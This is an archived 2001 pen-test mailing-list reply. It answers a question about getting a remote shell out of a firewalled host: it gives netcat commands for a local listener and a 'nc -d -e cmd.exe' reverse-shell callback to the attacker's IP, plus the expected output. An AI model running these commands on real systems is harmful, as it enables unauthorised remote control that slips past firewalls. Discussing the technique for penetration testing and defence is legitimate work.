sending a shell back to yourself. On your local computer run netcat in listen mode. nc -l -p 8888 execute netcat on remote server such that it sends a connection back to you. nc -d -e cmd.exe X.X.X.X 8888 (X.X.X.X is your IP) The netcat listener you setup should display something like this: Microsoft Windows [Version xxxx] (C) Copyright 1985-2000 Microsoft Corp. c:\> -mdb ----Original Message Follows---- From: Ilici Ramirez <ilici_ramirezat_private> To: pen-testat_private Subject: Server initiated remote shell Date: Fri, 21 Sep 2001 07:23:11 -0700 (PDT) Hi, Lets suppose that I can execute a program on an inside host on a network protected by a firewall. There is no way in. But there is a way out to www browsing on port 80. So the client could connect to any Internet address on port 80. What program should it execute to provide me with a shell? Of course I'm in Internet with a listener. What listener? The firewall is a real statefull firewall so no TCP ACK or ICMP encapsulations. Have a nice weekend too. Ilici R __________________________________________________ Terrorist Attacks on U.S. - How can you help? Donate cash, emergency relief information http://dailynews.yahoo.com/fc/US/Emergency_Information/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Fri Sep 21 2001 - 16:37:02 PDT